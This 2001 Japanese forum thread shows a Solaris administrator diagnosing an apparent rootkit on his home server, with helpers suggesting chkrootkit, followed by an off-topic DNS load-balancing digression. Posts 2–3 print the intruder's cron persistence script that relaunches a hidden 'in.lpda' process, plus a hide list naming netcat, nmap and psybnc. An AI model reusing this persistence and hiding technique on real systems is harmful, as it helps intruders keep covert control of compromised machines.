これは、やられたのでしょうか？

1 ：名無しさん＠お腹いっぱい。 ：2001/03/23(金) 23:03

ＡＤＳＬを使って鯖をたてていますが、
たまに数時間にわたり外部からのPINGが
９０％ロストするので、パケット量を調べました。
パケットが戻って来ない時に計測したら
上りの帯域の224Kbpsの10倍以上の
パケットが発信されていました。
やられた可能性があると思って調べてみました。

パケットは通るけど反応が極端に悪いことがたまにあり、
そういった時にプロセスを見てみたら不審なプロセスがありました。
親プロセスを捜す為にそのまま放置してみてまずは
定期的にcronでpsを記録してみました。
結果が >>2 です。これは、やられたのでしょうか？

2 ：1 ：2001/03/23(金) 23:08

yuichiro@ns/home/yuichiro/cron> date
Fri Mar 23 22:44:58 JST 2001
yuichiro@ns/home/yuichiro/cron> crontab -l
0 * * * * /home/yuichiro/cron/cronuptime
0 1,4,7,10,13,16,19,22 * * * /home/yuichiro/cron/cronps
yuichiro@ns/home/yuichiro/cron> cat /home/yuichiro/cron/cronuptime
#!/bin/csh -f
/usr/ucb/uptime | /usr/local/bin/xargs /bin/echo `/bin/date +%D` >> /home/yuichiro/cron/uptimedata
yuichiro@ns/home/yuichiro/cron> tail -5 /home/yuichiro/cron/uptimedata
03/23/01 6:00pm up 1 day(s), 7:07, 0 users, load average: 0.05, 0.02, 0.02
03/23/01 7:00pm up 1 day(s), 8:07, 0 users, load average: 0.01, 0.01, 0.01
03/23/01 8:00pm up 1 day(s), 9:07, 0 users, load average: 1.82, 1.71, 1.33
03/23/01 9:00pm up 1 day(s), 10:07, 0 users, load average: 1.80, 1.76, 1.70
03/23/01 10:00pm up 1 day(s), 11:07, 1 user, load average: 0.07, 0.15, 0.73
yuichiro@ns/home/yuichiro/cron> cat /home/yuichiro/cron/cronps
#!/bin/csh -f
set fn = ~yuichiro/cron/psdata/`/bin/date +%y%m%d-%H%M%S`
/usr/ucb/ps auxwwe > "$fn"a
/bin/ps -eo uid,pid,ppid,pmem,pcpu,stime,tty,args > "$fn"b
yuichiro@ns/home/yuichiro/cron> cd psdata
yuichiro@ns/home/yuichiro/cron/psdata> ls
010322-220000a 010323-010000a 010323-040000a 010323-070000a 010323-100000a 010323-130000a 010323-160000a 010323-190000a 010323-213533a 010323-220000a
010322-220000b 010323-010000b 010323-040000b 010323-070000b 010323-100000b 010323-130000b 010323-160000b 010323-190000b 010323-213533b 010323-220000b
yuichiro@ns/home/yuichiro/cron/psdata> head -4 010323-213533a
USER PID %CPU %MEM SZ RSS TT S START TIME COMMAND
root 14621 62.6 0.4 1560 1000 ? R 19:36:33 61:35 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
root 214 23.2 1.1 3912 2592 ? S Mar 22 39:21 /usr/sbin/syslogd PATH=/usr/sbin:/usr/bin TZ=Japan
root 234 3.9 0.9 2424 2128 ? S Mar 22 7:12 /usr/sbin/nscd PATH=/usr/sbin:/usr/bin TZ=Japan
yuichiro@ns/home/yuichiro/cron/psdata> grep ./in.lpda *
010323-040000a:root 7163 97.9 0.4 1512 944 ? R 03:39:39 20:17 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-040000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-070000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-100000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-130000a:root 7058 0.1 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-160000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:01 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-190000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:01 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-213533a:root 14621 62.6 0.4 1560 1000 ? R 19:36:33 61:35 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-213533a:root 7058 0.1 0.5 1512 1096 ? S 03:10:01 0:01 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
yuichiro@ns/home/yuichiro/cron/psdata> grep ./in.lpda 010323-213533b
yuichiro@ns/home/yuichiro/cron/psdata> grep 14621 010323-213533b
yuichiro@ns/home/yuichiro/cron/psdata> su

3 ：1 ：2001/03/23(金) 23:08

root@ns/var/spool/cron/crontabs# ls -l
-rw-r--r-- 1 root sys 190 Jul 7 2000 adm
-r--r--r-- 1 root root 750 Jul 7 2000 lp
-r-------- 1 root root 519 Jan 4 00:31 root
-rw-r--r-- 1 root sys 308 Jul 7 2000 sys
-r--r--r-- 1 root sys 214 Jul 7 2000 uucp
root@ns/var/spool/cron/crontabs# cat root | grep -v '^#'
10 3 * * 0,4 /etc/cron.d/logchecker
10 3 * * 0 /usr/lib/newsyslog
15 3 * * 0 /usr/lib/fs/nfs/nfsfind
1 2 * * * [ -x /usr/sbin/rtc ] && /usr/sbin/rtc -c > /dev/null 2>&1
10 3 * * * /etc/cron.d/syschecker
root@ns/etc/cron.d# ls -l
-rwxr--r-- 1 root sys 72 Jan 1 1970 .proto*
prw------- 1 root root 0 Mar 22 18:16 FIFO|
-rw-r--r-- 1 root sys 45 Jul 7 2000 at.deny
-rw-r--r-- 1 root sys 45 Jul 7 2000 cron.deny
-r-xr-xr-x 1 bin bin 1659 Jul 16 1997 logchecker*
-rw-r--r-- 1 root sys 17 Jan 1 1970 queuedefs
-rwxrw-rw- 1 root root 194 Oct 10 1998 syschecker*
root@ns/etc/cron.d# cat syschecker
#!/bin/sh
mv /dev/ptyq /dev/ptyp
ps -fe | grep in.lpda | grep -v grep | awk '{print "kill -9 "$2""}' > tmp3 ; chmod u+x tmp3 ;./tmp3
cd /usr/sbin/
./in.lpda &
rm -rf tmp3
mv /dev/ptyp /dev/ptyq
root@ns/etc/cron.d# lsa /dev/ptyq
-rw-r--r-- 1 root sys 122 Jul 16 1997 /dev/ptyq
root@ns/etc/cron.d# cat /dev/ptyq
rshd
sm.sh
sm
rcp
in.bind
lpNet
login
hub
cl
dpipe
bncsol
nmap
lpdx
lpdi
lpda
ssh
sshd
carko
ident
psybnc
nc
rape
in.lpda
root@ns/usr/sbin# lss in.*
-r-xr-xr-x 1 bin bin 10912 Jul 16 1997 in.comsat*
-rw-rw-rw- 1 bin bin 1 May 7 1998 in.fingerd
-r-xr-xr-x 1 bin bin 50612 Jul 16 1997 in.ftpd*
-rwxr-xr-x 1 bin bin 103200 May 6 1998 in.lpda
-r-xr-xr-x 1 bin bin 140688 Jul 16 1997 in.named*
-r-xr-xr-x 1 bin bin 16888 Jul 16 1997 in.rarpd*
-r-xr-xr-x 1 bin bin 24212 Jul 16 1997 in.rdisc*
-r-xr-xr-x 1 bin bin 11532 Jul 16 1997 in.rexecd*
-r-xr-xr-x 1 bin bin 22524 Jul 16 1997 in.rlogind*
-r-xr-xr-x 1 bin bin 31592 Jul 16 1997 in.routed*
-r-xr-xr-x 1 bin bin 22684 Jul 16 1997 in.rshd*
-r-xr-xr-x 1 bin bin 13988 Jul 16 1997 in.rwhod*
-r-xr-xr-x 1 bin bin 11868 Jul 16 1997 in.talkd*
-r-xr-xr-x 1 bin bin 34176 Jul 16 1997 in.telnetd*
-r-xr-xr-x 1 bin bin 15564 Jul 16 1997 in.tftpd*
-r-xr-xr-x 1 bin bin 6444 Jul 16 1997 in.tnamed*
-r-xr-xr-x 1 uucp uucp 9940 Jul 16 1997 in.uucpd*

4 ：名無しさん＠お腹いっぱい。 ：2001/03/23(金) 23:44

これSolaris?
一時的にどっかーんて動いてる個所があるけど、syslog に何か
出てない?
netstat とか sa とかある? あるならそっちで見たほうがいいかもね。

5 ：1 ：2001/03/23(金) 23:56

>>4
ありがとうございます。
それがですね、netstat や arp -a で何も表示されないんです。
以前は表示されていたので、書き換えられた可能性もあるかと思います。
yuichiro@ns/home/yuichiro/cron/psdata> netstat
yuichiro@ns/home/yuichiro/cron/psdata> arp -a
yuichiro@ns/home/yuichiro/cron/psdata>
また>>2の最後にもあります通り、/usr/ucb/ps で表示されているプロセスでも
その一部が /bin/ps では表示されないんです。>>2の14621などがそれです。
ちなみにsyslogですが、
yuichiro@ns/var/log> grep -v sendmail syslog | more
で、何も表示されません。どうしたものでしょうか。。。

6 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 03:19

http://www.chkrootkit.org/
チェックしてみ。

7 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 06:08

iyan! wasi no kopipe

8 ：名無しさん ：2001/03/24(土) 11:45

netstat -an は？

9 ：１ ：2001/03/24(土) 12:51

>>8　ダメのようです。何も出ません。
login: yuichiro
Password:
yuichiro has logged on pts/2 from riv249140.
yuichiro@ns/home/yuichiro> netstat -an
Exit 2
yuichiro@ns/home/yuichiro> su
Password:
# tcsh
unlimit: stacksize: Can't remove limit
unlimit: descriptors: Can't remove limit
You have new mail.
yuichiro has logged on pts/2 from riv249140.
root@ns/home/yuichiro# netstat -an
Exit 2
root@ns/home/yuichiro#

10 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 15:12

netstatとかpsとかCDROMからbinary引っ張ってきてそっち使って作業しな。

11 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 17:30

別のクリーンなディスクからブートして
そっちでchkrootkitしたまへ。

12 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 17:32

最近、DNS やってないホストの 53番に udp がよくくるんですが、
相手はたいてい逆引きできません。なぜ?

13 ：名無しさん ：2001/03/24(土) 19:57

>>12
逆引き登録されてないから
じゃないの？

14 ：１ ：2001/03/24(土) 19:57

>>10 >>11
それが。。。部屋のＡＤＳＬで鯖たてたまま
今は半年くらい、オーストラリアにいるんです。
なのでＣＤＲＯＭ使うこともできないっす。

15 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 20:18

そんな環境でほっとくのが悪いって思うのはオレだけ?

16 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 20:36

>>12
asahi.comの天気予報見に行ってない？
アホな仕様の付加分散とやらで、リゾル
バに逆引きにくるよ。

17 ：1 ：2001/03/24(土) 22:24

>>2 >>3
見にくくてスマソだけど、見た感じ、どうなんでしょう。
/usr/sbin/in.lpda や /dev/ptyq や /etc/cron.d/syschecker って
デフォルトで、あります？OS は Solaris2.6 Server です。

18 ：名無しさん ：2001/03/24(土) 22:41

>>16
詳細きぼんぬ

19 ：名無しさん＠お腹いっぱい。 ：2001/03/24(土) 23:59

>>17
とりあえず手元の Solaris2.6 にはない。
CD-ROM の中身は知らんが。

20 ：1 ：2001/03/25(日) 00:20

>>19
どうもです。やっぱ、やられてたようですね。
>>1に書いたような状況でしたので、
ＤｏＳ攻撃の足場にでもされていたのでしょう。
セキュリティに関して甘すぎました。
勉強します。ありがとうございました。

21 ：名無しさん＠お腹いっぱい。 ：2001/03/25(日) 01:05

うーん？

22 ：16 ：2001/03/25(日) 01:33

>>18
wether.asahi.comへのアクセス負荷分散の
ために、wether.asahi.comのクエリーがあ
ると、クエリーをかけてきたIPアドレスに
複数のサーバから、そのアドレスの逆引き
を問い合わせて、応答時間の早いものを
wether.asahi.comのAレコードとして返す
んだと。

逝ってよしでしょ？

23 ：ロッソ＠ＸＥｍａｃｓ ：2001/03/25(日) 02:06

　〃
（中」中）ノ　それ３ＤＮＳみたいなものかなぁ。別に炒って良しでもないと思う。

24 ：名無しさん＠お腹いっぱい。 ：2001/03/25(日) 03:05

クライアントのゾーンを持つDNSサーバ(これもなー)で
なくて、外部からアクセスできる保証の無いリゾルバに
聞いてどうするって感じだけど。

25 ：ロッソ＠ＸＥｍａｃｓ ：2001/03/25(日) 04:08

　〃
（中」中）ノ　あ！　ping 打つとかじゃなくて、名前聞いてくるのか。それは逝ってもいいな。

26 ：名無しさん ：2001/03/25(日) 11:27

レスポンスを計測するのはpingだけに限らないだろ？
3DNS でも dns only に設定できると思われ

27 ：名無しさん＠お腹いっぱい。 ：2001/03/25(日) 12:07

まあasahi.comくらい巨大になると我々の想像できない苦労があるんだろう…

28 ：名無しさん＠お腹いっぱい。 ：2001/03/26(月) 23:04

して本題は？

29 ：名無しさん＠お腹いっぱい。 ：2001/03/27(火) 20:48

たかが一日一千万アクセスぐらいで苦労があるのかなぁヽ(´ー｀)ノ

30 ：名無しさん＠お腹いっぱい。 ：2001/03/27(火) 23:02

そりゃあるでしょう。

31 ：名無しさん＠引く手あまた ：2001/03/29(木) 15:02

>>12　>>16　>>22　>>23　〜
プライドの高いUNIX板の厨房の癖。
自分でよくわからん事が載ってると
別の話題持ち出して揉み消そうとする。

32 ：名無しさん＠引く手あまた ：2001/04/06(金) 15:46

age

33 ：名無しさん＠お腹いっぱい。 ：2001/04/16(月) 19:21

２ｃｈのレヴェルでは解決不能らしいね。

34 ：名無しさん＠お腹いっぱい。 ：2001/04/16(月) 20:57

そうですね

35 ：名無しさん＠お腹いっぱい。 ：2001/04/16(月) 21:31

>>負荷分散
JANOG で似たような話やってたな。
ttp://www.janog.gr.jp/meeting/janog5/log/ogino-log.txt
ttp://www.janog.gr.jp/meeting/janog5/pdf/ogino.pdf

36 ：名無しさん＠お腹いっぱい。 ：2001/04/22(日) 08:03

新年、明けましておめでとうございます。

read.cgi ver5.26+ (01/10/21-)